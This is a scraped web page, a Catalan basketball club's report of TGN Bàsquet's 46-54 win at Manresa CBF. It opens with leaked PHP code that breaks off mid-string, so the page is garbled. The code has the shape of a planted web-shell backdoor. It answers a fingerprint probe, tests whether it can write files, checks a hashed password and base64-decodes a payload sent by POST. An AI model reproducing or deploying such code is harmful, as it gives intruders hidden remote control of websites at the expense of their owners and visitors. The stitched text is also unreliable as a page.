function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El TGN trenca la mala ratxa amb un gran partit a Manresa (46-54) - Tgn Bàsquet Club -

El TGN trenca la mala ratxa amb un gran partit a Manresa (46-54)

Updated: març 11, 2024

Partit corresponent a la vintena jornada de Supercopa Catalunya femenina, on el Sènior A ha visitat la pista del Manresa CBF, equip que arribava amb un balanç de 16 victories i 4 derrotes.

El TGN Bàsquet va sortir a pista oferint una de les millors versions de la temporada. L’equip entrenat per Israel Esteve va completar un gran primer periode on va sorprendre novament a un dels millors equips de la categoria, el Manresa CBF. L’encert en els tirs exteriors (2 triples de Clàudia Vadillo i 2 més d’Andrea Sisniega) i una gran tasca defensiva de les liles va suposar el primer gran avantatge al minut 8 (8-16).

El segon periode va tenir una tònica similar al primer: el TGN controlava el ritme de joc i l’encert en els tirs des del perímetre allunyava a l’equip tarragoní en el marcador. Tot i l’absència de dues jugadores claus com la capitana Laura Pascual i la Paula Ibáñez, les liles han recuperat les millors sensacions de la temporada, marxant al descans amb un còmode 22-34.

La segona meitat ha començat amb un canvi d’intensitat per part de l’equip local. Les jugadores dirigides per l’exentrenador lila Marc Rovirosa han sortit amb una pistonada més al tercer quart, reduint diferències fins a només 5 punts (30-35 al min 25). Però novament, ha aparegut la millor versió de les tarragonines per tornar a posar els dobles dígits de diferència al marcador (30-43 al final del 3r quart).

El TGN era conscient que patiria per tancar el partit a un Nou Congost on el Manresa CBF encara no coneixia la derrota. Cap a les acaballes del partit, dues cistelles seguides de Queralt Ribera han posat el 41-46 a falta de 2 minuts per la conclusió de l’encontre. Tot i això, les liles han mantingut el cap fred i han tancat el partit amb un gran encert a la línia dels tirs lliures, suposant el 46-54 final i la 8a victòria que dona aire a l’equip.

A la propera jornada, el TGN rebrà la visita del CB Prat, el dissabte 16 de març a les 18:00h.